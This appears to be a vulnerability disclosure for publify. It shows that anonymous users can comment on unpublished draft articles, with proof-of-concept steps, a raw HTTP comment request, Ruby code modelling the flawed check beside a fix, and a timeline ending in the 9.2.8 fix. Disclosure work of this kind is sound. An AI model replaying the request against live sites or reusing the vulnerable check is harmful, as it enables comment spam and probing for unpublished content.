Improper Access Control in publify/publify

Reported on Feb 10th 2022

Articles in draft mode can only be accessed by admins who have permission to manage articles. Anonymous users cannot view a draft article, but they can leave comments on it. The cause of the vulnerability is that a draft article is created with comments enabled, and the create_comment function only checks whether comments are enabled or disabled, not whether the article is in draft or published state.

Proof of Concept

  • Step 1: Log in to the demo account, create an article in draft mode and note its id.
  • Step 2: Visit the website as an anonymous user, obtain a session cookie and CSRF token, and send the following request with the id of the draft article.
POST /comments?article_id=3281 HTTP/1.1
Cookie: _publify_blog_session=c908f541644f3d97dbf90e4ef273253b
Content-Length: 130
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
X-Csrf-Token: WHlz0364OOQtQuoHCuYkYeqBcxSgcp4xxj+gdu+z4dWXkwGhtLqZZgvy2j0YiQ1G+CJFiRdl3GlbO5w5ZxLkOg==
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

  • Step 3: In the browser of the demo account, open the draft article: the anonymous comment is visible on the unpublished article.
  • PoC screenshots: "Unpublish article" and "Create comment" (images not reproduced).

Anonymous users can leave comments on articles in draft mode. An attacker can also use the vulnerability to enumerate the ids of draft articles, and can run a comment-spam attack even when the application has disabled comments on all public articles.
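As an added illustration (not publify's own models or controller code), the following Ruby models the faulty gate described above next to a hardened one; the names Article, Comment and CommentGate and the sample records are assumptions.

```ruby
# Simplified stand-in for the report's scenario; not publify's code.
# Article, Comment and CommentGate are assumed names for this example.
Article = Struct.new(:id, :title, :state, :allow_comments) do
  def published?
    state == :published
  end
end

Comment = Struct.new(:article_id, :author, :body)

module CommentGate
  # Vulnerable check, mirroring the report: only the comment-enabled
  # flag is consulted, the draft/published state is never examined.
  def self.vulnerable_create(article, author, body)
    return nil unless article.allow_comments
    Comment.new(article.id, author, body)
  end

  # Hardened check: a visitor may comment only on an article that is
  # both published and has comments enabled. A draft is refused
  # regardless of its comment flag, so posting a comment can no longer
  # confirm that a draft with a given id exists.
  def self.hardened_create(article, author, body)
    return nil unless article.published? && article.allow_comments
    Comment.new(article.id, author, body)
  end
end

# Constructed sample data: a draft with comments enabled (the default
# the report describes), a public article with comments disabled, and
# a public article open for comments.
DRAFT = Article.new(3281, "Unpublished post", :draft, true)
PUBLIC_NO_COMMENTS = Article.new(3282, "Public post", :published, false)
PUBLIC_OPEN = Article.new(3283, "Open post", :published, true)

if __FILE__ == $PROGRAM_NAME
  [[:vulnerable_create, DRAFT], [:hardened_create, DRAFT],
   [:hardened_create, PUBLIC_NO_COMMENTS], [:hardened_create, PUBLIC_OPEN]].each do |meth, art|
    result = CommentGate.public_send(meth, art, "anon", "hello")
    puts "#{meth} on #{art.title} (#{art.state}): #{result ? 'accepted' : 'refused'}"
  end
end
```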

  • We are processing your report and will contact the publify team within 24 hours. (2 years ago)
  • nhiephon modified the report. (2 years ago)
  • We have contacted a member of the publify team and are waiting to hear back. (2 years ago)
  • Matijs van Zuijlen validated this vulnerability. (2 years ago)
  • nhiephon has been awarded the disclosure bounty.
  • The fix bounty is now up for grabs.
  • We have sent a fix follow up to the publify team. We will try again in 7 days. (2 years ago)
  • We have sent a second fix follow up to the publify team. We will try again in 10 days. (2 years ago)
  • We have sent a third and final fix follow up to the publify team. This report is now considered stale. (2 years ago)


  • A fix has been prepared.
  • Matijs van Zuijlen marked this as fixed in 9.2.8 with commit 0e6c66. (2 years ago)
  • Matijs van Zuijlen has been awarded the fix bounty.